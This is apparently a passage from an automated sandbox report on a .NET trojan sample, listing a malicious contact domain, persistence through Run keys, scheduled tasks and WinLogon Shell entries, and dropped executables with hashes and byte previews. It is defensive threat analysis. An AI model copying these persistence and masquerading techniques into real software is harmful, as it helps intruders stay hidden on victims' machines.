                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brCegCJVAgFM.16.drfalse
                                                                                      		high
                                                                                      http://durok.ruservices.exe, 00000010.00000002.2938691750.0000000002B50000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.carterandcone.comlservices.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://ac.ecosia.org/autocomplete?q=services.exe, 00000010.00000002.2975130306.00000000125DC000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.0000000012543000.00000004.00000800.00020000.00000000.sdmp, 7IED4XG4iO.16.drfalse
                                                                                          		high
                                                                                          http://durok.ru/services.exe, 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.fontbureau.com/designers/cabarga.htmlNservices.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.founder.com.cn/cnservices.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.fontbureau.com/designers/frere-user.htmlservices.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.phpQgKDservices.exe, 00000010.00000002.2938691750.00000000027C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.jiyu-kobo.co.jp/services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.fontbureau.com/designers8services.exe, 00000010.00000002.3030682142.000000001F962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://support.mozilla.orgCegCJVAgFM.16.drfalse
                                                                                                      		high
                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesservices.exe, 00000010.00000002.2975130306.0000000012696000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.00000000133BB000.00000004.00000800.00020000.00000000.sdmp, gLYsbvyxi6.16.drfalse
                                                                                                        		high
                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=services.exe, 00000010.00000002.2975130306.00000000125DC000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000010.00000002.2975130306.0000000012543000.00000004.00000800.00020000.00000000.sdmp, 7IED4XG4iO.16.drfalse
                                                                                                          		high

                                                                                                          World Map of Contacted IPs

                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs

                                                                                                          Public IPs

                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          104.21.93.162
                                                                                                          		durok.ruUnited States
                                                                                                          		13335CLOUDFLARENETUStrue

                                                                                                          General Information

                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                          Analysis ID:1581018
                                                                                                          Start date and time:2024-12-26 17:16:07 +01:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 11m 9s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:41
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample name:Z4D3XAZ2jB.exe
                                                                                                          renamed because original name is a hash value
                                                                                                          Original Sample Name:0a5d9cd0a4b6abdbb272262811774a8d.exe
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@37/74@1/1
                                                                                                          EGA Information:
                                                                                                          • Successful, ratio: 73.3%
                                                                                                          HCA Information:Failed
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .exe

                                                                                                          Warnings

                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 4.175.87.197, 184.28.90.27, 13.107.246.63
                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                          • Execution Graph export aborted for target ZDtOzYsYYWKWEhNYzFc.exe, PID 7244 because it is empty
                                                                                                          • Execution Graph export aborted for target ZDtOzYsYYWKWEhNYzFc.exe, PID 7384 because it is empty
                                                                                                          • Execution Graph export aborted for target services.exe, PID 5296 because it is empty
                                                                                                          • Execution Graph export aborted for target services.exe, PID 7468 because it is empty
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                          Simulations

                                                                                                          Behavior and APIs

                                                                                                          TimeTypeDescription
                                                                                                          11:17:10API Interceptor1061294x Sleep call for process: services.exe modified
                                                                                                          16:17:01Task SchedulerRun new task: services path: "C:\Windows\GameBarPresenceWriter\services.exe"
                                                                                                          16:17:01Task SchedulerRun new task: servicess path: "C:\Windows\GameBarPresenceWriter\services.exe"
                                                                                                          16:17:01AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run services "C:\Windows\GameBarPresenceWriter\services.exe"
                                                                                                          16:17:02Task SchedulerRun new task: ZDtOzYsYYWKWEhNYzFc path: "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                          16:17:02Task SchedulerRun new task: ZDtOzYsYYWKWEhNYzFcZ path: "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                          16:17:09AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFc "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                          16:17:17AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run services "C:\Windows\GameBarPresenceWriter\services.exe"
                                                                                                          16:17:25AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFc "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                          16:17:33AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run services "C:\Windows\GameBarPresenceWriter\services.exe"
                                                                                                          16:17:41AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFc "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                          16:17:58AutostartRun: WinLogon Shell "C:\Windows\GameBarPresenceWriter\services.exe"
                                                                                                          16:18:06AutostartRun: WinLogon Shell "C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                          16:18:15AutostartRun: WinLogon Shell "C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                          16:18:23AutostartRun: WinLogon Shell "C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                          16:18:31AutostartRun: WinLogon Shell "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"

                                                                                                          Joe Sandbox View / Context

                                                                                                          IPs

                                                                                                          No context

                                                                                                          Domains

                                                                                                          No context

                                                                                                          ASNs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          CLOUDFLARENETUShttp://vanessa.nilsson@dmava.nj.govGet hashmaliciousUnknownBrowse
                                                                                                          • 104.21.50.150
                                                                                                          https://www.gglusa.us/Get hashmaliciousUnknownBrowse
                                                                                                          • 104.18.11.207
                                                                                                          0zBsv1tnt4.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.11.101
                                                                                                          cqHMm0ykDG.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.11.101
                                                                                                          setup.msiGet hashmaliciousUnknownBrowse
                                                                                                          • 172.67.134.27
                                                                                                          installer.msiGet hashmaliciousUnknownBrowse
                                                                                                          • 104.21.6.3
                                                                                                          setup.msiGet hashmaliciousUnknownBrowse
                                                                                                          • 104.21.6.3
                                                                                                          pVbAZEFIpI.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.157.254
                                                                                                          GxX48twWHA.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.66.86
                                                                                                          ERTL09tA59.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.66.86

                                                                                                          JA3 Fingerprints

                                                                                                          No context

                                                                                                          Dropped Files

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          C:\Users\user\Desktop\ADqcsYvZ.log67VB5TS184.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            4t8f8F3uT1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              F3ePjP272h.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                cbCjTbodwa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                  vb8DOBZQ4X.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                    6G8OR42xrB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      XNPOazHpXF.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                        9FwQYJSj4N.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                          8k1e14tjcx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                            gkcQYEdJSO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                                                              Created / dropped Files

                                                                                                                              C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3163910
                                                                                                                              Entropy (8bit):7.992391848855575
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:49152:ILfoFX5SJqMr60Ag4ErCKLYy3XxggNblydYuwVHlizQ/U4oiUT6JgcBKMzWpwneR:8AkqMrv4ErCKbfl/uwVHlNlzQUWWeWC
                                                                                                                              MD5:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              SHA1:9571472C5D0899E517E1C1F84C6C05DFD2ABB2B5
                                                                                                                              SHA-256:9C2AD3D80258AF2508987D952DD5A7744BEDBDD16260E4F76412EA6696774285
                                                                                                                              SHA-512:439D108D086E6231513A7D40E01EA9C8D1B0D9948C9412F2828F694D94CCFA64E98D8A6956464CCCB632BB072AAE4E3C00154733BC3AF97A11CD7A57F0B0FB10
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                              Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@..p....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                                                                                                              C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe:Zone.Identifier

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):26
                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                              Malicious:true
                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                              C:\Program Files (x86)\Windows Defender\en-GB\d766a8fd310fca

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with very long lines (466), with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):466
                                                                                                                              Entropy (8bit):5.862890432846636
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:jmGp/SJBK/0JYmWSjLw1hf18Q+ssKSRdNUiLt196n/H4U:yW/SJBY05jLwr18QTrQAn/YU
                                                                                                                              MD5:DE97C6B68239112E04623640D92F20F3
                                                                                                                              SHA1:FBAF697B269BF91AE56FB8593A62D3833559EFEA
                                                                                                                              SHA-256:002392B18CB51235E8D1A03C1AC2ACBD3D8E3B0B6632B08E158E52C06A8C7807
                                                                                                                              SHA-512:1CCD4E450E0F04130A563914A716E1EDB74BC200C472BD543D82EA3C2AC42C4AD6A06FE1532ED0368160B1F5C172F10CF62E93AF0991AE26792E4A70C06BAE9E
                                                                                                                              Malicious:false
                                                                                                                              Preview:PcB28S0dfT2svcAHEAxZsokvdNQIWWHP70HhV1y9Tp48i9fmMIyn6stk1PYuBsHIMmu4UdvMMxGDtmNesn5NieTOGgpGdD8liwv5PlRtXmaImq0PB4CYw3krTgxyyotJzff70SOHWM05DKlZpaEiAkyoLEmsxd5s2RTHL2Ytp5BkDooI4YIXkKIPq0wwpgU3RHCw1eNwBV3FiOkhaeyYUhIsIEbUGmDJlIS5l1QaKWWOQDqcQPWLr5it9UowD2qZRueZ5o5iNXO8L3bEX8E1P1bpki6RNdXRp66gjRgmTy8TqjiG2jZEyyJaSyzWroUtA7SO65fGcbhb3H8A90YoETc1wgNubK4pdPTtRUJ7DSlWRsgLzzW1PqorebbarvoSh28oyPtprblvrGjE9C4mxCZwkmP03sPSoTzZt2XkGrKyF39Y1Wap0BeecLDM93v8LSHYQKUHoUgG2lrqm1

                                                                                                                              C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exe

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3163910
                                                                                                                              Entropy (8bit):7.992391848855575
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:49152:ILfoFX5SJqMr60Ag4ErCKLYy3XxggNblydYuwVHlizQ/U4oiUT6JgcBKMzWpwneR:8AkqMrv4ErCKbfl/uwVHlNlzQUWWeWC
                                                                                                                              MD5:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              SHA1:9571472C5D0899E517E1C1F84C6C05DFD2ABB2B5
                                                                                                                              SHA-256:9C2AD3D80258AF2508987D952DD5A7744BEDBDD16260E4F76412EA6696774285
                                                                                                                              SHA-512:439D108D086E6231513A7D40E01EA9C8D1B0D9948C9412F2828F694D94CCFA64E98D8A6956464CCCB632BB072AAE4E3C00154733BC3AF97A11CD7A57F0B0FB10
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                              Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@..p....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                                                                                                              C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exe:Zone.Identifier

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):26
                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                              Malicious:false
                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                              C:\Program Files (x86)\Windows Multimedia Platform\d766a8fd310fca

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with very long lines (507), with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):507
                                                                                                                              Entropy (8bit):5.875279671400233
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:1BMBUyuFaucBqZLexY7g84+Pg7ygyRn82MAwoHidJd4tdHL:rMBvuqsKY7njPgRAwoHidI1
                                                                                                                              MD5:7956B9F1EFD0F4D81B18B9DDC3F32F61
                                                                                                                              SHA1:213E111A366F92890B6E42254EDD7118F98BED65
                                                                                                                              SHA-256:AE267E50F3602869528BF95C7A5E1ECC5B0E7FB8D65684466DFB46E8311A0E88
                                                                                                                              SHA-512:EFF4BE6AB4BB776000EE2AD68FC3416B88BD4B8A6F84262FD10A5D88F85AC7B636DFA43DF3345EAF3A20952FBC7877244C72E981602F5E780952B55C11171582
                                                                                                                              Malicious:false
                                                                                                                              Preview:Gl7D3yOn0EDxUBhFJdeYMN44MGWyV25fFO0zZMhdueImhAu8hNDdQ1T3rD0wcaS8IhsFKsq66BnrFRWLWXQHycPN56IWVvBUMJdARoxygGgPNlyZqoZEJKJqSfJOjTlLATe5yW3sjclr699THspqW6KC9xswejOMfVP4H3kUuqerjcuSfzG1o4zDIb6BnHNANYMkuFMOHV5pcddhDZRpdXilfMvp7jqndedLQJian1tS8Kkp8Y8O0ihzzkEiUhRipSL89SR401CloQmVlFrilcx56oWpEAFFkLnq8mppHDX9g5Li8t6O0s6NeQBV6lz0v6Bcn6X8aBbhEyZBdxrVD1P1OZMslUtfOhNj4s4CV7xyRYIp1A2I4ew3qJNNtpXFR5ThkzGu2p9FDbj0Rg0kckktuT3verSqksgVFkEB3HQPfq0PjX6NywnrVkxQ6VPLWSfV4OvqbzrUUVNDdnLGvF2xEzAexxFi1E2MLeVVmPv9FTX9WtxSJJaRarQ

                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Z4D3XAZ2jB.exe.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1830
                                                                                                                              Entropy (8bit):5.3661116947161815
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHmHKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKktGqZ4vtd
                                                                                                                              MD5:4E98592551BD0B069F525D5145C4AB1D
                                                                                                                              SHA1:F76B60DC100FAB739EB836650B112348ED7B9B97
                                                                                                                              SHA-256:171B3D8F6F3559D645DECCA2C9B750EBFD5511B6742C0157C60F46EAD6CC4F5E
                                                                                                                              SHA-512:E5C520597C414A3F73AF0C4F2E2A61CE594D8CEC7FF103D94CCAEA905E0D5F6AF32CFAB40026865AE86172904F927B928663C9FA4B0EBD397CC450BF124A318D
                                                                                                                              Malicious:true
                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ZDtOzYsYYWKWEhNYzFc.exe.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              File Type:CSV text
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1281
                                                                                                                              Entropy (8bit):5.370111951859942
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                                                              MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                                                              SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                                                              SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                                                              SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                                                              Malicious:false
                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\services.exe.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:CSV text
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1281
                                                                                                                              Entropy (8bit):5.370111951859942
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                                                              MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                                                              SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                                                              SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                                                              SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                                                              Malicious:false
                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                                                                              C:\Users\user\AppData\Local\Temp\6oebA3mKmm

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):20480
                                                                                                                              Entropy (8bit):0.5707520969659783
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                              Malicious:false
